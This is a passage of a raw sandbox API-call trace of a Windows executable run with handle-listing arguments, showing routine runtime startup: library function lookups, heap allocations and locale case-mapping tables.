[0249.031] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0249.031] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0249.031] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0249.031] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0249.031] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0249.031] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0249.031] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0249.031] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0249.032] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0249.032] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0249.032] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0249.032] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0249.032] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0249.032] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0249.032] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0249.032] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0249.032] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0249.032] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0249.032] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0249.032] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0249.032] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0249.034] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0249.034] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x49dceee0, dwHighDateTime=0x1d68287)) [0249.034] GetCurrentThreadId () returned 0x30c [0249.034] GetCurrentProcessId () returned 0x78c [0249.034] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=36937274381) returned 1 [0249.034] GetProcessHeap () returned 0x2b0000 [0249.034] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0249.034] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0249.034] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0249.034] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0249.035] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0249.035] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0249.035] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0249.035] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0249.035] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0249.035] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0249.035] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0249.035] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0249.035] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0249.035] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0249.036] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0249.036] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0249.036] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0249.036] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0249.036] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0249.036] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0249.036] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0249.036] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0249.036] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0249.036] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0249.037] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0249.037] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0249.037] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0249.037] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0249.037] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0249.037] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0249.037] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0249.037] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0249.037] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0249.037] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0249.038] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x3bc) returned 0x2c60b0 [0249.038] GetCurrentThreadId () returned 0x30c [0249.038] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x2c6478 [0249.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x800) returned 0x2c6498 [0249.039] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c -y -p handles -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0xd1a87c5e, hStdError=0x0)) [0249.039] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0249.039] GetFileType (hFile=0x3) returned 0x2 [0249.039] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0249.039] GetFileType (hFile=0x7) returned 0x2 [0249.040] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0249.040] GetFileType (hFile=0xb) returned 0x2 [0249.040] GetCommandLineW () returned="tdq963ii.exe -accepteula -c -y -p handles -nobanner" [0249.040] GetEnvironmentStringsW () returned 0x2c6ca0* [0249.040] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb78) returned 0x2c7820 [0249.040] FreeEnvironmentStringsW (penv=0x2c6ca0) returned 1 [0249.040] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x88) returned 0x2c6ca0 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xa0) returned 0x2c6d30 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x3e) returned 0x2c83b8 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c6dd8 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6e) returned 0x2c6e50 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x78) returned 0x2bf8d0 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x62) returned 0x2c6ec8 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2e) returned 0x2c6f38 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x48) returned 0x2c6f70 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1c) returned 0x2c5a80 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x28) returned 0x2c6fc0 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1a) returned 0x2c5aa8 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4a) returned 0x2c6ff0 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x72) returned 0x2bf950 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x30) returned 0x2c7048 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2e) returned 0x2c7080 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1c) returned 0x2c5ad0 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xd2) returned 0x2c70b8 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x7c) returned 0x2c7198 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x36) returned 0x2c7220 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x3a) returned 0x2c8400 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x90) returned 0x2c7260 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x24) returned 0x2c72f8 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x30) returned 0x2c7328 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x36) returned 0x2c7360 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x48) returned 0x2c73a0 [0249.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x52) returned 0x2c73f0 [0249.042] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x3c) returned 0x2c8448 [0249.042] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x18) returned 0x2c7450 [0249.042] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x82) returned 0x2c7470 [0249.042] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2e) returned 0x2c7500 [0249.042] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1e) returned 0x2c5af8 [0249.042] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2c) returned 0x2c7538 [0249.042] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x54) returned 0x2c7570 [0249.042] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x52) returned 0x2c75d0 [0249.042] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2a) returned 0x2c7630 [0249.042] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x3c) returned 0x2c8490 [0249.042] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x54) returned 0x2c7668 [0249.042] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x24) returned 0x2c76c8 [0249.042] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x30) returned 0x2c76f8 [0249.042] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8c) returned 0x2c7730 [0249.042] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c7820 | out: hHeap=0x2b0000) returned 1 [0249.043] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x800) returned 0x2c77c8 [0249.043] GetLastError () returned 0x0 [0249.043] SetLastError (dwErrCode=0x0) [0249.043] GetLastError () returned 0x0 [0249.043] SetLastError (dwErrCode=0x0) [0249.043] GetLastError () returned 0x0 [0249.043] SetLastError (dwErrCode=0x0) [0249.043] GetACP () returned 0x4e4 [0249.043] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x220) returned 0x2c7fd0 [0249.043] GetLastError () returned 0x0 [0249.043] SetLastError (dwErrCode=0x0) [0249.043] IsValidCodePage (CodePage=0x4e4) returned 1 [0249.043] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0249.043] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0249.043] GetLastError () returned 0x0 [0249.043] SetLastError (dwErrCode=0x0) [0249.043] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0249.043] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0249.043] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0249.043] GetLastError () returned 0x0 [0249.043] SetLastError (dwErrCode=0x0) [0249.043] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0249.044] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0249.044] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0249.044] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0249.044] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÎ}¨Ñäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0249.044] GetLastError () returned 0x0 [0249.044] SetLastError (dwErrCode=0x0) [0249.044] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0249.044] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0249.044] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0249.044] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0249.044] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 